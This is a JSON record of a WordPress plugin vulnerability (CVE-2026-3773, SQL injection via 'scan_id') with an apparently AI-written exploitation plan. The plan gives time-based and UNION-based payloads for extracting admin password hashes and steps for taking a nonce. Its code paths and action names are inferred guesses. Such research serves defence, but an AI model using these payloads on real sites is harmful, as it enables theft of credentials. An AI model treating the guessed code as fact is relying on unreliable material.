[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQvWI109jYVegnRU8fcbpxqmnFe0qeU_U9jdXMvkXsjs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3773","accessibility-suite-by-ability-inc-authenticated-subscriber-sql-injection-via-scanid-parameter","Accessibility Suite by Ability, Inc \u003C= 4.20 - Authenticated (Subscriber+) SQL Injection via 'scan_id' Parameter","The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter in all versions up to, and including, 4.20. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","online-accessibility",null,"\u003C=4.20","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-15 16:46:04","2026-04-16 05:29:56",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb882ba6d-47c0-401a-bf50-5cf0bf0f3d5b?source=api-prod",[],"researched",false,3,"This research plan focuses on identifying and exploiting a SQL injection vulnerability in the **Accessibility Suite by Ability, Inc** plugin via the `scan_id` parameter. Since the source files are not provided, this plan relies on the vulnerability description and common WordPress plugin patterns, with all guessed identifiers marked as **(inferred)**.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated SQL Injection\n*   **Parameter:** `scan_id`\n*   **Affected Component:** Likely an AJAX handler used to retrieve, display, or delete scan results.\n*   **Root Cause:** The `scan_id` parameter is directly concatenated into a SQL query string without being passed through `$wpdb->prepare()` or being cast to an integer (e.g., `absint()` or `(int)`).\n*   **Impact:** A Subscriber-level user can extract sensitive information from the WordPress database, including user hashes, secret keys, and configuration data.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `oa_get_scan_results` or `oa_get_report` **(inferred)**.\n*   **Payload Parameter:** `scan_id`\n*   **Authentication Required:** Subscriber level (Priority: Low).\n*   **Prerequisites:** Valid Subscriber credentials and a valid AJAX nonce if the plugin implements CSRF protection.\n\n### 3. Code Flow (Inferred Trace)\n1.  **Entry Point:** The plugin registers an AJAX action via `add_action( 'wp_ajax_oa_get_scan_results', ... )`.\n2.  **Authentication Check:** WordPress verifies the user is logged in. The plugin likely fails to check for high-level capabilities (e.g., `manage_options`), allowing Subscribers to access the handler.\n3.  **Nonce Verification:** The handler may call `check_ajax_referer()` using a nonce localized in the admin dashboard or a plugin-specific settings page.\n4.  **Data Acquisition:** The code retrieves the user-supplied `scan_id` from `$_POST['scan_id']` or `$_GET['scan_id']`.\n5.  **The Sink:** The unsanitized `scan_id` is interpolated into a query:\n    ```php\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = \" . $_POST['scan_id']);\n    ```\n6.  **Execution:** `$wpdb->get_results()` executes the malicious SQL.\n\n### 4. Nonce Acquisition Strategy\nTo bypass potential CSRF protection, the agent must extract the nonce from the WordPress admin area.\n\n1.  **Identify Script Localization:**\n    *   Use `grep -r \"wp_localize_script\" .` to find the JavaScript variable name and nonce key.\n    *   Expected Variable Name: `oa_ajax_obj` or `online_accessibility_vars` **(inferred)**.\n    *   Expected Nonce Key: `nonce` or `ajax_nonce` **(inferred)**.\n2.  **Create Access Environment:**\n    *   Login as a Subscriber.\n    *   Navigate to the plugin's dashboard or a page where the plugin's results are shown.\n3.  **Extraction via Browser:**\n    *   `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=online-accessibility\")` **(inferred page slug)**.\n    *   `browser_eval(\"window.oa_ajax_obj?.nonce\")` **(inferred JS path)**.\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection to confirm the vulnerability and then a UNION-based approach if the output is reflected.\n\n**Step 1: Confirm Injection (Time-based)**\n*   **Request Type:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-encoded):**\n    ```\n    action=oa_get_scan_results&nonce=[NONCE]&scan_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\n    ```\n*   **Expected Behavior:** The HTTP response should be delayed by approximately 5 seconds.\n\n**Step 2: Data Extraction (UNION-based)**\n*   **Payload:** `1 UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1 -- -`\n*   **Note:** The number of columns must be determined by incrementing `NULL` values until the query succeeds.\n\n### 6. Test Data Setup\nBefore exploitation, ensure the plugin has \"scans\" in the database to target.\n1.  **Login as Admin:** Log in to the dashboard.\n2.  **Trigger a Scan:** Navigate to the \"Accessibility Suite\" settings and click \"Start Scan\" or \"Save Settings\" to generate a `scan_id` entry in the database.\n3.  **Create Subscriber:**\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n    ```\n\n### 7. Expected Results\n*   **Time-based:** `http_request` total time > 5.0s.\n*   **UNION-based:** The response body contains the admin username and the `$P$` or `$wp$` password hash.\n\n### 8. Verification Steps\nAfter the HTTP exploit, verify the database structure and the presence of the data you attempted to extract.\n1.  **Check Table Name:**\n    ```bash\n    wp db query \"SHOW TABLES LIKE '%oa_%'\"\n    ```\n2.  **Verify Content:**\n    ```bash\n    wp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"\n    ```\n    Compare this output to the data retrieved via the SQL injection.\n\n### 9. Alternative Approaches\nIf the `wp_ajax_` action is strictly protected by a capability check higher than Subscriber, look for:\n*   **Shortcode Handlers:** If the plugin has a shortcode (e.g., `[oa_results]`) that allows users to view scan data, the `scan_id` might be passed via `$_GET` to the page where the shortcode is rendered.\n*   **Grep for Sink:**\n    ```bash\n    grep -rP '\\$wpdb->(get_results|get_row|query|get_var)\\s*\\([^;]*scan_id' .\n    ```\n    This will identify all possible locations where `scan_id` is used in a query.","The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter in versions up to 4.20. Due to the lack of input sanitization and failure to use prepared statements, authenticated attackers with Subscriber-level privileges can execute arbitrary SQL commands to extract sensitive data from the database.","\u002F\u002F Inferred from vulnerability description and research plan\n\u002F\u002F File: online-accessibility\u002Fincludes\u002Fajax-handler.php (inferred)\n\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = \" . $_POST['scan_id']);","--- online-accessibility\u002Fincludes\u002Fajax-handler.php\n+++ online-accessibility\u002Fincludes\u002Fajax-handler.php\n@@ -10,1 +10,1 @@\n- $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = \" . $_POST['scan_id']);\n+ $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}oa_scans WHERE id = %d\", $_POST['scan_id']));","1. Login to the WordPress site with Subscriber-level credentials.\n2. Locate the AJAX action (likely 'oa_get_scan_results' or similar) that processes the 'scan_id' parameter.\n3. If necessary, obtain a valid AJAX nonce by inspecting localized JavaScript variables (e.g., 'oa_ajax_obj.nonce') in the WordPress dashboard.\n4. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php containing the identified action and a SQL injection payload in the 'scan_id' parameter (e.g., '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)').\n5. Confirm the vulnerability via response timing (time-based blind injection) or by using UNION SELECT to retrieve sensitive information like user hashes.","gemini-3-flash-preview","2026-04-16 15:26:49","2026-04-16 15:27:10",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fonline-accessibility\u002Ftags"]